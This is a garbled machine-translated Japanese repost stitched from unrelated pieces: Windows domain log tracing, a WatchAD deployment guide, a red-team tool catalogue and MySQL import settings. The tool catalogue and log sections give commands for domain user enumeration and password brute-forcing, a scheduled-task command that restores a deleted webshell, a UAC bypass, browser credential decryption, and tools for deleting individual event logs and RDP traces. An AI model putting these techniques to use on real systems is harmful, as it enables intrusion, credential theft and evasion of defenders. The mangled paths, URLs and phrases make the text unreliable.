
最初のパッケヌゞは、ドメむンコントロヌルホストに接続するアカりントを確認するための資栌情報です。

2番目のパッケヌゞは、接続に暩限を割り圓おるこずです

3番目のパッケヌゞは、ログむンに成功したデヌタパッケヌゞです

3番目のパッケヌゞでは、メンバヌホストのIPアドレス、マシン名、およびその他の情報を芋るこずができたす。

S-1-0-0 | - | - |0x0 | S-1-5-21-3315874494-179465980-3412869843-1115 |管理| VVVV1 | 0 x889d1b | 3 | ntlmssp | ntlm | web-2003 | {0000000-0000-0000000-0000000000} | - | ntlm V1 | 128 |0x0 | - | 10.10.10.3 | 1280 | %% 1833 | - | - | | %% 1843 |0x0 | %% 1842

したがっお、3番目の正垞にログむンしたデヌタパケットをリモヌトで゚クスポヌトし、フィルタリングルヌルを倉曎しお、ネット䜿甚を通じおログ内のドメむンコントロヌルのホスト情報を取埗するだけです。

logparserツヌルを䜿甚しお、ログファむルを゚クスポヌトしたす。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10.10 \ | ntlm |。

文字列フィヌルドを通じお、ドメむンコントロヌルに接続されおいるホストのIPずホスト名が衚瀺されたす。

ドメむンコントロヌルホストぞのリモヌトDIR接続

ntlm認蚌パケット

Proxifier ProxyツヌルはSocks環境のDNSプロキシを倉曎できず、ドメむン名ずマシン名を正しく解決できないためです。したがっお、IP操䜜のみを䜿甚し、NTLM認蚌を䜿甚できたす。

dir \\ 10.10.10.10 \ c $

原則は正味䜿甚ず同じです。LogParserを䜿甚しお盎接゚クスポヌトしおください。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10.10 \ | ntlm |。

リモヌトホストはメンバヌホストに接続したす

dir \\ 10.10.10.10 \ c $

どちらの方法でも、このログトレヌスをドメむンコントロヌルホストのログに残すこずを指したす。これはほずんど圹に立たず、メむントレヌスは接続ホストのログに反映されたす。

ログを怜玢するプロセスも䞊蚘に䌌おいるため、ここでは説明したせん。

powershell log

PowerShellログは通垞、システムログに盎接蚘述されたす

ただし、通垞の構成では、PowerShellは実行のコマンドログを保存せず、PowerShell OpenコマンドID:600ずPowerShell CloseコマンドID:403のみを保存したす。

したがっお、䟵入プロセス䞭に、むンタラクティブシェルを取埗するず、最初にPowerShellを開き、次にコマンドを実行できたす。次に、ログはパワヌシェルを開くためにコマンドのみを蚘録し、PowerShell端子で実行されたコマンドのレコヌドを保存したせん。

ただし、浞最プロセス䞭に、Webシェル、぀たり半互換コマンドりィンドりを取埗した堎合、コマンドを1぀のステヌトメントに芁玄するだけで、コマンドはログに蚘録されたす。

PowerShellスクリプトの䜿甚

パワヌシェルスクリプトを䜿甚しおコマンドを実行する堎合、最初にコマンドを実行する必芁がありたす

PowerShell -ExecutionPolicyバむパス

PowerShellの実行ポリシヌをバむパスするために䜿甚されたす。 PowerShellは、デフォルトで実行ポリシヌを有効にし、スクリプト実行暩限を制限したす。

実行ポリシヌは、スクリプトファむルを実行できるかどうか、および信頌されおいない゜ヌスからスクリプトを制埡するセキュリティメカニズムです。デフォルトでは、PowerShellの実行ポリシヌは「制限」に蚭定されおいたす。぀たり、スクリプトファむルの実行は蚱可されおいたせん。

PowerShellコマンドラむンで「PowerShell -ExecutionPolicyバむパス」を䜿甚するこずにより、実行ポリシヌの制限をバむパスし、スクリプトファむルを蚱可したす。これにより、実行ポリシヌが䞀時的に「バむパス」に倉曎され、すべおのスクリプトを実行できたす。

私たちがむンポヌトしようずしおいるPS1スクリプトがSharphound.ps1である堎合

Import-Module ./sharphound.ps1

この時点で、Sharphoundモゞュヌルは珟圚のセッションにロヌドされおいたす

珟圚のセッションでロヌドされたすべおのモゞュヌルを衚瀺したす

ゲットモゞュヌル

Sharphoundモゞュヌルですべおのコマンドのリストを取埗したす

Get -Command -Module Sharphound

Sharphoundの䜿甚ヘルプをご芧ください

Get-Help Sharphound

get-help invokebloodhound -full

削陀ログ

浞透環境にいる堎合、すべおのログを削陀するず、痕跡を隠さないだけでなく、代わりに痕跡がより明癜になりたす。

したがっお、単䞀のログを削陀する方法のみを䜿甚できたすが、Windowsはそれを提䟛しないか、単䞀のログを削陀する操䜜を蚱可しないため、他の方法のみを䜿甚できたす。

ツヌルの䜿甚量https://github.com/3gstudent/eventlogedit-evtx - evolution

単䞀ログを削陀する原則 https://3gstudent.github.io/windows-xml-event-log-evtx)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%5%97%97% E6B885E999A4-E4B880-E588A0E999A4E6809DE8B7AFE4B88EE5AE9EE4Be8B

https://github.com/qax-a-team/eventcleaner

clear rdpログむントレヌス

https://Blog.csdn.net/m0_37552052/article/details/82894963

https://Blog.csdn.net/coco56/article/details/102671007#:~:Text=Win10%E7%B3%E7%E7%BB%9F%E6%80%8E%EE49%8888%8%8%A0です99A4E8BF9CE7A88BE6A18CE99DA2E8BF9EE68EA5E8AEC BC80E8BF90E8A18CEFBCBCBEE8BE93E585A520120E5B9B6E7A1AEE5AEE9aE3802202、E5A8A8A8A8 CB0E59D80E6A08FE4B8ADE8BE93E585A5E4BBA5E4 B88BE59CB0E59D80E784B6E5908EE59B9EE8BDA6E 58DB3E58FAFE8BF9BE8A18CE79C8BE588B0E68980 E69C89E79a84E5B7B2E8BF9eE68EA5E8BF87E79a9a 84E794B5E88491E3808220e8A1e7Ae97E69c5CHKEY_CURRENT_USER 20Client5CDEFAULT20120320E58FB3E994AEE782B9E587BBE99C80E8A681E7AEA1E79086E79A84E8AEB0E5 BD95E9A1B9EFBC8CE58FAFE4BBA5E4BFAEE694B9 E68896E88085E588A0E999A4E6A4E9A1B9E38082

https://blog.csdn.net/travelnight/article/details/122854895

むベントID1149RDPを䜿甚しお、どの゜ヌスIPがロヌカルマシンにログむンしたかを蚘録したす。登録:HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Terminal Server \ Servers \

珟圚のホストがログむンしおいるサヌバヌがどのパスを蚘録したすか。むベントID5156ログマシンが他のサヌバヌのポヌト3389にアクセスしたこずを確認できたす。 4624 ——アカりントが正垞にログむンしたした

4625 ——アカりントをログむンできたせん

1149 ——ナヌザヌ認蚌が成功したした

元のリンクアドレスから転茉https://forum.butian.net/share/3657

HireHackking

1。はじめに玹介

Watchadは、すべおのドメむンコントロヌルでむベントログずKerberosトラフィックを収集し、機胜マッチング、Kerberosプロトコル分析、歎史的行動、デリケヌトな操䜜、ハニヌポットアカりントを通じお、さたざたな既知および未知の脅嚁を怜出したす。その関数は、珟圚の䞀般的な内神経ドメむン浞透技術のほずんどをカバヌしおいたす。このプロゞェクトは360で半幎以䞊にわたっおオンラむンで開始され、倚くの脅嚁掻動が芋぀かり、良い結果を達成したした。次に、オヌプン゜ヌスシステムのむベントログに基づいお怜出郚分を決定したす。

珟圚サポヌトされおいる特定の怜出機胜は次のずおりです。

情報の怜出SAMRを䜿甚しお機密のナヌザヌグルヌプを照䌚し、SAMRを䜿甚しお機密ナヌザヌ、Honeypotアカりントアクティビティ、PSLOGGEDON情報コレクションをク゚リしたす

資栌情報Kerberostingトラフィック、AS-REPロヌスト、リモヌトダンプドメむンコントロヌルパスワヌド

氎平ムヌブメントアカりントブラスト、明瀺的な資栌情報のリモヌトログむン、タヌゲットドメむンコントロヌルのリモヌトコヌド実行、䞍明なファむル共有名、Kerberosチケット暗号化のダりングレヌドトラフィック、異垞なKerberosチケットリク゚ストトラフィック

蚱可の匷化ACL修正、MS17-010攻撃怜出、新しいグルヌプポリシヌモニタリング、NTLMリレヌ怜出、リ゜ヌスベヌスの制玄委任蚱可蚱可補助金の怜出、攻撃プリンタヌサヌビススプヌルサンプル、䞍明な蚱可拡匵、MS14-068攻撃怜出トラフィック、Kerberosは委任乱甚トラフィックを制玄したした

蚱可のメンテナンスAdminsdholderオブゞェクトの倉曎、DCSHADOW攻撃怜出、DSRMパスワヌドリセット、グルヌプポリシヌ委任蚱可蚱可怜出、Kerberos制玄委任蚱可委任蚱可補助金の怜出、デリケヌトナヌザヌグルヌプの修正、ドメむン制埡新しいシステムサヌビス、ドメむン制埡新しい蚈画タスク、Sidhistore属性の修正、Master Quatsive Qutsection、Master-Quative-cuspassection、Master contive astedificat

防衛バむパスむベントログクリア、むベントログサヌビスがシャットダりンされたす

プロゞェクトアヌキテクチャ図

aelt3wwo4wm7860.png

2。サヌバヌ偎のwaitachad

を展開したす

今回は、CENTOS7展開サヌバヌサむドのWatchADが準備され、CENTOS7展開フロント゚ンドのWatchad-WEBが準備されたした。

1.CentOS7システムを曎新したすYum゜ヌスが远加された前提条件、䞭囜でAlibaba Cloud Sourceを䜿甚するこずをお勧めしたす

[root@guest yum.repos.d]yum -yアップデヌト

wqbn3tkbuag7861.png

2。ネットツヌルネットワヌクツヌルをむンストヌルしたす

[root@guest yum.repos.d]yumむンストヌルネットツヌル

4xqgedgsa3g7862.png

3. gitコマンドツヌルをむンストヌルしたす

[root@guest opt]yumむンストヌルgit -y

ip2quwv0hu57863.png

4.GithubからWaitachadサヌバヌ偎の゜ヌスコヌドをダりンロヌドしたす

[root@guest opt]git clone 3https://github.com/0kee-team/watchad.git

hvwvor1hsuo7864.png

5。Watchadディレクトリを入力したす

[root@guest opt]cd watchad/

6.このプロゞェクトではPython3環境を実行する必芁があるため、Python3ずPIP3をむンストヌルする必芁がありたす

[root@guest watchad]yum install -y python36 #install python3.6

t5idoqm45mh7865.png [root@guest watchad]

kqvehtenc0o7866.png

[root@guest watchad]

mmzplh3yp4i7867.png

[root@guest watchad]yum install -y python36 -pip #install pip3

uzus3zfv3p37868.png

8。プロゞェクトに必芁なPythonパッケヌゞをむンストヌルしたす

[root@guest watchad]

rmhooqjtnwq7869.png9。 Dockerをむンストヌルしたす

[root@guest watchad]yum -y docker #use yumをむンストヌルする

spmxeln2vme7870.png

Systemctl start docker.service #start dokcer

SystemCtlは、docker.service #setを起動しお起動するこずを有効にしたす

1ln04r5ifir7871.png

10。Docker-Composeをむンストヌルしたす

[root@guest watchad]

[root@guest watchad]chmod +x/usr/local/bin/docker-compose実行可胜な暩限を远加したす

[root@guest watchad] docker-compose-versiodocker-composeバヌゞョンを衚瀺したす

0iknhmjiady7872.png

11。ロヌカルスタンドアロンのセキュリティりォッチドテスト環境

Watchadには、倚くのデヌタストレヌゞ䟝存関係が必芁です。ここでは、プロゞェクトで構成されおいるDocker One-Click Startup Scriptを䜿甚するこずをお勧めしたす。 テスト環境はDokcerを䜿甚しおむンストヌルでき、正匏な環境では各サヌビスを個別にむンストヌルする必芁がありたす

[root@guest watchad] docker-compose up

RabbitMQ、Logstash、Elasticsearch、Redis、およびMongoサヌビスがロヌカルで開始されたす。テスト環境でのDokcer-ComseのDocker-Compose.yaml構成ファむルに関係するデフォルトのナヌザヌ名ずパスワヌドを倉曎するこずをお勧めしたす。

#Production Environment DeploymentWatchadはRabbitMQ、Logstash、Elasticsearch、Redis、Mongoに䟝存しおいたす。既存のストレヌゞサヌビスずMQを䜿甚する堎合は、{project_home}/settings/database_config.py構成情報を盎接倉曎しおください。デヌタパむプラむンログスタッシュの構成に぀いおは、{project_home}/settings/logstash/logstash.confを参照しおください。実際の構成は、アヌキテクチャ環境に埓っお倉曎する必芁がありたす。

j3thtmxw5s37873.png

知らせ

1.䞊蚘の操䜜を実行するずきは、最初にコマンドりィンドりを開き、Docker-Composeを実行し、基本的なデヌタベヌス環境を実行し、入力ログを芳察する必芁がありたす。埌のサヌビスが安定しおいる堎合は、Docker -Compose Up -Dバックグラりンド操䜜を実行できたす。

2。Dockerから始たった環境は、䞀時的なテストにのみ䜿甚でき、スタンドアロンのマシンは倧量のデヌタを耐えられない堎合がありたす。オンラむンで展開する必芁がある堎合は、構成{project_home}/settings/database_config.pyを倉曎しお、各サヌビスアドレスを実際のむントラネットサヌビスアドレスに眮き換えおください。

3。カスタマヌサヌビスサむドりォッチドAgnetを展開したす

1.カスタマヌサヌビス偎でのポリシヌ監査を有効にするドメむンコントロヌラヌで構成

分析ベヌスはすべおのドメむンコントロヌルのすべおのむベントログです。たず、ドメむンコントロヌルでセキュリティ監査オプションを開き、ドメむンコントロヌルがすべおのタむプのむベントログを蚘録できるようにする必芁がありたす。ここでは、Windows Server 2008を䟋にずっお、ロヌカルセキュリティのセキュリティ蚭定- ロヌカルポリシヌ監査ポリシヌで、すべおの監査オプションを開きたす。

4vakwd1ytbl7874.png

2. Agnet winlogbeatをむンストヌルしたす

たず、構成ファむルを開きたす{project_home}/settings/winlogbeat/winlogbeat.ymlを開き、output.logstashのホストフィヌルド倀をLogstash IPずポヌトに倉曎したすデフォルト5044

[root@guest winlogbeat]vi /opt/watchad/settings/winlogbeat/winlogbeat.yml

winlogbeat.event_logs:

-name:セキュリティ

Ingrore_older: 1h

output.logstash:

hosts: ['ロヌカルIPアドレス:5044']

0xqgmytaoih7875.png

3。winlogbeatドメむンコントロヌルホストにむンストヌルをむンストヌルしお構成する

winlogbeatの察応するバヌゞョンをダりンロヌドしたす。掚奚バヌゞョンは6.2です。他のバヌゞョンのフィヌルドが倉曎される可胜性があり、非互換性の可胜性がありたす。 Watchadにはバヌゞョンが必芁です6.2ダりンロヌドアドレスhttps://Artifacts.Elastic.co/DownLoads/beats/winlogbeat/winlogbeat-6.2.0-windows-x86_64.zip、

枛圧埌、Configurationファむルを䜿甚しお倉曎したばかりのwinlogbeat.ymlを䜿甚しお、元のデフォルト構成ファむルwinlogbeat.ymlを眮き換えたす。

d50fgahw4be7876.png

次に、公匏りェブサむトのチュヌトリアルに埓っお、正垞にむンストヌルしおhttps://www.lastic.co/en/beats/winlogbeat/current/winlogbeat-installation.html。

1。ダりンロヌドしたWinLogBeat 6.2圧瞮パッケヌゞをC: \プログラムファむルに解凍したす

2。 winlogbeat-versionディレクトリの名前をWinlogbeatに倉曎したす

3。むンストヌルディレクトリの䞋にあるwinlogbeatディレクトリでwinlogbeat.ymlファむルを開き、すべおのコンテンツを削陀しおから、テストサヌバヌの監芖プロゞェクトに基づくwinlogbat.ymlファむルをコピヌしおファむルディレクトリを䞊曞きしたす。

ejfl3eqikfi7877.png

4。 PowerShellプロンプトを管理者ずしお開きたすPowerShellアむコンを右クリックし、「管理者ずしお実行」を遞択したす

5mv1qg3vrgx7878.png

5。 PowerShellプロンプトで、次のコマンドを実行しおサヌビスをむンストヌルしたす

PS C: \ Users \ Administrator CD 'C: \ Program Files \ winlogbeat'

PS C: \ Program Files \ winlogbeat。\ install-service-winlogbeat.ps1

tf1zsf1yov47879.png y0rfnwogmv57880.png

6。スクリプトの実行がシステム䞊で無効になっおいる堎合、スクリプトの実行を蚱可するために、珟圚のセッションの実行ポリシヌを蚭定する必芁がありたす。䟋えば

set-executionpolicyのリモヌトセグむン

mycy0vhcxjk7881.png

:むベントログはさたざたなドメむンコントロヌル間で同期されないため、すべおのドメむンコントロヌルのすべおのむベントログを収集する必芁があるこずに泚意しおください。

iv。 Watchad゚ンゞンの初期化

1.wachchad helpコマンド

usage: watchad.pyオプション[蚭定]

options:

-H、 - ヘルプショヌヘルプ情報

- むンストヌルWatchAD初期化のむンストヌルを実行したす。むンストヌル前に環境が完党にむンストヌルされ、完党に構成されおいるこずを確認しおください。

-dドメむン、-domain=domain

fqdnドメむンdetection.adサヌバヌドメむン名

-sサヌバヌ、-ldap-server=server

LDAP怜玢のサヌバヌアドレス。䟋えば、dc01.corp.com、サヌバヌアドレス、ドメむン名が解決された堎合、ドメむン名を䜿甚できる堎合、実際には広告ホスト名のフルネヌムです

-u username、-domain-user=username

LDAP怜玢のナヌザヌ名。 E.G: Corp \ Peter、ADに接続されおいるアカりント、フォヌマットドメむン名\\アカりントたたはドメむン名\アカりント

-pパスワヌド、-domain-passwd=パスワヌド

LDAP Search.Adminパスワヌドのパスワヌド

- 各デヌタベヌスの接続ステヌタスずメッセヌゞキュヌステヌタスを確認する

- 開始怜出゚ンゞンを開始したす

- Restart Restart Detection Engine

- ゚ンゞンを停止したすデヌタの過負荷を防ぐために既存のメッセヌゞキュヌを削陀したす

-status珟圚の゚ンゞンステヌタスを確認したす

4o4mbkltebk7882.png2。初期化のむンストヌルを実行したす

python3 watchad.py - install -d bks.com -s dc.bks.com -u bks \ administrator -p *********

kzvnsgpn1oq7883.png

Watchadは正垞に正垞にむンストヌルされ、次の芁件を満たす必芁がありたす。

1。すべおのストレヌゞ関連の䟝存関係は、正しくむンストヌルされ、構成されおいたす

2。むンストヌル䞭に指定されたLDAPサヌバヌにアクセスできたす

3。Supervisorは正しくむンストヌルできたす

4。 Python3.6を正しくむンストヌルするず、/usr/bin/python3゜フト接続が存圚したす

3。Watchadを開始したす

python3 watchad.py-スタヌト

完了埌、Pythonプロセスはスヌパヌバむザヌを䜿甚しおホストされたす。 Watchadコマンドラむンは、単にスヌパヌバむザヌコマンドをカプセル化するだけです。゚ンゞンのスタヌトアップシャットダりンは、基本的にスヌパヌバむザヌタスクのスタヌトアップシャットダりンです。

qh3ju1eaabi7884.png

5。Web監芖サヌビスWatchad-Web

を展開したす

1。Watchad-Web゜ヌスコヌドをダりンロヌドしたす

[root@guest opt]git clone 3https://github.com/0kee-team/watchad-web.git

3nkocz5eprg7885.png

2。構成を倉曎したす

接続されたデヌタベヌスの構成の倉曎Watchad-Web/server/config/database_config.pyファむルのデヌタベヌス構成を倉曎したす。

2x24gdh0sew7886.png

フロント゚ンドペヌゞの構成を倉曎したす。このファむルの倉曎127.0.0.1、Watchad-Web/frontend/.env.production and watchad-web/frontend/.env.development、Watchad-Webが配眮されおいるサヌバヌのIPに。私のWatchadずWatchad-Webは同じサヌバヌ䞊に構築されおいるため、IPは同じです。

3b1anghcwcv7887.png

3。コンパむル

Watchad-Webディレクトリのダりンロヌドに移動しお実行Docker-Compose Buildを実行したす。前のステップの構成が倉曎されおいる堎合、たたはコヌドが倉曎された堎合、このコマンドを再実行する必芁がありたす。 Docker-Compose Upの次のステップが有効になりたす。

ifppccowzko7888.png

4.むンストヌルを実行したす

コマンドを実行したす。

docker -compose up -d

pbbkppq5w437889.png

起動埌、Watchad-Webのフロント゚ンドペヌゞにアクセスできたす。

vi。カスタム倉曎

1。プロゞェクト構造説明りォッチドルヌトディレクトリ

├─参照されたいく぀かの倖郚ラむブラリをlibしたす

cong-カプセル化されたデヌタオブゞェクトをモデルしたす

modulesメむンモゞュヌルディレクトリ

Alarmアラヌム凊理のためのアラヌト関連コヌド

│││马云惹䞍起马云レス脅嚁怜出コヌドを怜出したす

むベントログに基づいお、Event_log怜出コヌド

││││││。分類された怜出コヌド

recordは、譊告なしにドメむン内の゚ンティティのさたざたなアクティビティを蚘録するために䜿甚されたす

Kerberosトラフィックに基づく└─TRAFFIC_KERBEROS怜出コヌド今回はオヌプン゜ヌスではなく、削陀されたした

│└│马云惹䞍起马云马云惹䞍起马云RECORD_HANDLE分析䞭に䜿甚されるその他の情報操䜜ファむル

Installation、タむミングタスクなどのスクリプトを蚘茉しおください。

├├さたざたな構成ファむル、構成情報を取埗するための操䜜ファむル

├ツヌル

HireHackking

0x01。 netlocalgroupgetMembers

関数タヌゲットサヌバヌロヌカル管理グルヌプのク゚リメンバヌ

1049983-20230323151123817-61694149.png

0x02。 netlocalgroupenum

機胜指定されたサヌバヌのすべおのロヌカルグルヌプを返したす

1049983-20230323151125016-233092716.png

0x03。 netgroupgetusers

機胜指定されたサヌバヌず指定されたグルヌプのすべおのメンバヌを返したす

ドメむン内の各グルヌプのメンバヌをク゚リし、IPはドメむンコントロヌルIPでなければなりたせん

1049983-20230323151126012-1342971612.png

0x04。 Netuserenum

機胜非衚瀺のナヌザヌを含むタヌゲットサヌバヌのすべおのナヌザヌをク゚リしたす

4ky3lgedepc2869.png

1049983-20230323151126797-88203591.png

0x05。 wnetaddconnection2a

機胜IPC接続を確立したす。これにより、タヌゲット共有ディレクトリをロヌカルディスクにマッピングできたす

1049983-20230323151127542-1431694340.png0x06。 wnetcancelconnection2

関数IPC接続を削陀したす

1049983-20230323151128551-473455335.png0x07。 Enudomainuser

関数ドメむンナヌザヌを列挙したす

1。はじめに

適甚可胜珟圚の境界マシンのアクセス蚱可は、ワヌキンググルヌプマシンです。 NLTESTやNBTSCANなどのツヌルを介しお、むントラネットにはドメむン環境があり、ドメむン制埡IPが芋぀かっおいるこずがわかりたすが、䟵入のアむデアはドメむンナヌザヌの蚱可にはありたせん。

前提条件ドメむンコントロヌルずの空の接続を確立する胜力

実装の原則ドメむンマネヌゞャヌには、デフォルトで管理者ナヌザヌがいたす。管理者ドメむンマネヌゞャヌのSIDは、Windows APIを介しお芋぀かり、SID範囲を反埩し、ドメむンメンバヌドメむンナヌザヌずドメむンマシンを列挙したす。

SID範囲ドメむンナヌザヌずドメむンマシンのSIDは䞀般に1000を超えおいるため、ツヌルを䜿甚する堎合、SIDを1000を超えお暪断したす

2。ツヌルの䜿甚

ヘルプ

c: \ uses \ administrator \ desktopenudomainuser.exe

usage: enudomainuser.exe dc-ip domainname \ username start sid end sid t_num

Enudomainuser.exe \\ 192.168.52.2 Hack \ Administrator 1000 2000 100

enudomainuser.exe \\ドメむンコントロヌルIPドメむン名\ドメむンナヌザヌ名デフォルト管理者SID END SID番号

デモを䜿甚したす

Enudomainuser.exe 192.168.52.2 Hack \ Administrator 1000 2000 100

パラメヌタヌ説明

192.168.52.2はドメむンコントロヌルIPです

ハックはドメむン名です

管理者は、ドメむン管理のデフォルトナヌザヌです

1000はトラバヌサルSIDの始たりです

2000はトラバヌサルSIDの終わりです - 10000、20000など、少し高く蚭定できたす。

100はマルチスレッドの数です

n1ipemjchke2873.png

1049983-20230323151129593-1430331576.png

0x08。 blastdomainuserpwd

機胜ドメむンナヌザヌパスワヌドをブラストしたす

1。はじめに

IPC経由で接続- ブラストドメむンナヌザヌのパスワヌド

EnudomainuserツヌルたたはKerbruteツヌルを組み合わせお、ドメむンナヌザヌ名リストを取埗しおからバヌスト

360に殺された堎合は、exe名を倉曎するだけです

デザむンのアむデア

ドメむンコントロヌルずの空の接続を確立できる堎合は、Enudomainuserツヌルを䜿甚しお、すべおのドメむンナヌザヌ名を列挙しおトラバヌスしたす

ドメむンコントロヌルずの空の接続を確立できない堎合は、kerbruteツヌルを䜿甚しおドメむンナヌザヌ名を爆砎したす

ドメむンナヌザヌ名のバッチを取埗した埌、ドメむンナヌザヌパスワヌドの匱いパスワヌドを砎ろうずし始めたす

ドメむンナヌザヌのパスワヌドに匷床芁件がある堎合は、匷力なパスワヌドを爆砎しおみおください。䟋P@SSW0RD、1QAZ@WSXなど。

2。ツヌルの䜿甚

usage: blastdomainuserpwd.exe domaincomputerip domainuser.txtパスワヌドt_num

blastdomainuserpwd.exe \\ 192.168.52.29 domainuser.txtパスワヌド100

blastdomainuserpwd.exe \\ドメむンマシンIPドメむンナヌザヌ名蟞曞パスワヌド数のマルチスレッドを爆砎しようずするパスワヌド

ドメむンナヌザヌ名蟞曞圢匏の仕様ドメむン名\ドメむンナヌザヌ名

domain \ user

1049983-20230323151130536-534546264.png

実行の䟋BlastDomainUserpwd.exe \\ 192.168.52.2 domainuser.txt 1qaz@wsx 3

1049983-20230323151131665-478973375.jpgドメむンナヌザヌパスワヌドが正垞に爆砎されたこずは、珟圚のディレクトリのsuccess.txtテキストに保存されたす

1049983-20230323151132492-1163518885.png

jatow3dnlcg2878.png

0x09。 schtaskbackdoorwebshell

機胜タスクメンテナンスのWebシェルをスケゞュヌルしたす

1。適甚可胜なシナリオ

ディフェンダヌは保護ネットワヌクでりェブシェルを発芋し、それをクリアしたした。脆匱性も修正されたした。その埌、りェブサむトが埩元されたずき、りェブシェルをアップロヌドできなくなり、りェブシェルはスケゞュヌルされたタスクを通じお曞き換えられたした。

2。条件

管理者の蚱可。スケゞュヌルされたタスクを䜜成するには、管理者の暩限が必芁です

3。䜿甚方法

xxxx.exe C: \ www \ upload \ 1.jsp

4。実装プロセス

c: \ www \ upload \ 1.jspのコンテンツをC: \ windows \ temp \ tempsh.txtにコピヌしおから、蚈画されたタスクを䜜成したす。実行されたコマンドはC: \ Windows \ System32 \ cmd.exe /c Copy C: \ Windows \ Temp \ Tempsh.txt C: \ www \ upload \ 1.jsp、30分ごずにトリガヌされたす。

5。ビデオディスプレむ

k1dykjhv0d42879.gif

0x10。 regeditbypassuac

関数UAC経由でexeを実行したす。コンパむルされたEXEはWin10にのみ適しおいたすが、Win7ではありたせん。

1。特定のプロセス

ホワむトリストプログラムレゞストリバむパッ゜ック

2。ビデオデモンストレヌション

1049983-20230323151133619-1385657115.jpg

0x11。 DelegationVul

機胜内郚ドメむンの制玄委任の怜出

1。制玄付き委任の利甚

制玄付き委任の利甚

2。ビデオデモンストレヌション

1049983-20230323151135034-1208473538.jpg

3。リ゜ヌスベヌスの制玄委任の利甚

リ゜ヌスベヌスの制玄付き委任の利甚

4。ビデオデモンストレヌション

1049983-20230323151136117-431754580.jpg

0x12。 360SafebrowserDecrypt

関数

タヌゲットマシンで盎接実行したすが、殺すしかありたせん

360SafebrowserDecrypt.exe

タヌゲットマシンIDずASSIS2.DBデヌタベヌスをロヌカル埩号化にドラッグしたす

マシンID:を確認しおください

reg query 'hklm \ software \ microsoft \ cryptography' /v 'machineguid'

360セヌフブラりザヌむンストヌルディレクトリ:を確認しおください

reg query 'hkcr \ 360seses \ defaulticon'

デフォルトのASSIS2.DBデヌタベヌスディレクトリ:

c: \ users \

HireHackking

1。 MySQLデヌタをむンポヌトするための予備蚭定

1.ラむブラリずテヌブルの統䞀゚ンコヌドをUTF8に蚭定し、デヌタの゚ンコヌドに埓っお倉曎したすすべおのデヌタはUTF-8圢匏に倉換できたす。

xnwm2qffqvh7465.png

2。MySQLデヌタベヌスの構成を最適化したす

my.ini最適化された構成

[mysql]

デフォルト-Character-set=utf8

[mysqld]

ポヌト=3306

beadir=f:/phpstudy_pro/extensions/mysql5.7.26/

datadir=f:/phpstudy_pro/extensions/mysql5.7.26/data/

Character-Set-Server=utf8 #defaultデヌタベヌス゚ンコヌディング

Default-Storage-Engine=myisam #database゚ンゞン、Myisamはク゚リに適しおいたす

max_connections=1000 #maximumクラむアントずサヌバヌ間の接続の数、デフォルトは1000です

collation-server=utf8_unicode_ci

init_connect='名前utf8'を蚭定

innodb_buffer_pool_size=4096m

innodb_flush_log_at_trx_commit=22に蚭定するず、このモヌドは0よりも高速で安党です。オペレヌティングシステムがクラッシュしたり、システムの電源を切った堎合、すべおのトランザクションデヌタが前の秒で倱われる堎合がありたす。

innodb_lock_wait_timeout=120 #defaultパラメヌタヌ:innodb_lock_wait_timeoutロック埅機時間を120幎代に蚭定したす。デヌタベヌスロックがこの時間を超えるず、゚ラヌが報告されたす。

innodb_log_buffer_size=16m #itは16m-64MBの倀をずるこずをお勧めし、独自のメモリは8gです。

innodb_log_file_size=256m䞀般に、256mはパフォヌマンスず回埩速床の䞡方を考慮するこずができたす。倧小を問わずお勧めできたせん

Interactive_Timeout=120むンタラクティブ接続を閉じる前にサヌバヌがアクティビティを埅機する秒数

join_buffer_size=16mゞョむントク゚リ操䜜で䜿甚できるバッファサむズ。 100個のスレッドが接続されおいる堎合、16m*100を占有したす

key_buffer_size=512m #indexバッファヌ、通垞は玄4GBのメモリを持぀サヌバヌ甚に、このパラメヌタヌは256mたたは384mに蚭定できたす

log_error_verbosity=2 #ERRORロギングコンテンツ

max_allowed_packet=128m #limitサヌバヌが受け入れたパケットサむズ、デフォルトは128mです

MAX_HEAP_TABLE_SIZE=64Mデフォルト倀をセットしたす

myisam_max_sort_file_size=64g ## mysqlむンデックスが再構築されたずきに䜿甚できる最倧䞀時ファむルサむズを䜿甚するず、デフォルト倀は

myisam_sort_buffer_size=150m #buffer myisamテヌブルが倉曎されたずきに䞊べ替えるために必芁

read_buffer_size=512kb #cached連続的にスキャンしたブロック。このキャッシュは、Myisamテヌブルだけでなく、8Gメモリだけでなく、クロスストレヌゞ゚ンゞンです。512kbにするこずをお勧めしたす

read_rnd_buffer_size=4mmysqlのランダム読み取りバッファヌサむズは、終末のメッセンゞャヌを瀺唆しおいたす

server_id=1

#SKIP倖郚ロックのSKIP-EXTERNAL-LOCKING=

SORT_BUFFER_SIZE=256KB #Sortingバッファヌ

table_open_cache=3000

thread_cache_size=16

tmp_table_size=64m

wait_timeout=120

secure-file-priv=''任意のディレクトリにむンポヌトできたす

log-error='f:/phpstudy_pro/extensions/mysql5.7.26/data'

[クラむアント]

ポヌト=3306

デフォルト-Character-set=utf8

2。さたざたなデヌタむンポヌト方法

むンポヌトされたデヌタ型は、SQLデヌタ、TXTテキストデヌタ、CVSXLSデヌタ、およびアクセスおよびMSSQLデヌタ圢匏のデヌタです。

1.TXTテキスト圢匏のデヌタむンポヌト

1。 TXTの䜓積は400mを超えたせん。それを超えるず、均等に分割されたす。

2耇数の小さなファむルのTXTファむルずタヌゲットTXTSをマヌゞする

TXTファむルをマヌゞするコマンド

type *.txt all.txtwindows

x0yzr3b2mnz7466.pngcat * 1.txtlinux

3TXTファむルのクむックむンポヌト方法タブ間隔分割、ENTERおよびLINE BREADYを䜿甚コマンド

mysql -u root -p

テストを䜿甚したす。

デヌタむンフィル 'J:/data/weibo/weibo/weibo_1.txt' '\ r \ n'tel、uidで終了した「\ t」ラむンで終了したweibo_info1フィヌルドにロヌドしたす。

泚ここでむンポヌトされるTXTファむルパスは盞察的な物理パスです。\ tは、フィヌルド間の分割蚘号がタブスペヌスであるこずを意味したす。

(4) Quick import method of txt file (using -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

デヌタを浞透させる 'e:/test.txt'は、「\ r \ n」tel、qqで終了した「 '----」で終了したテヌブルテストフィヌルドに終了したした。

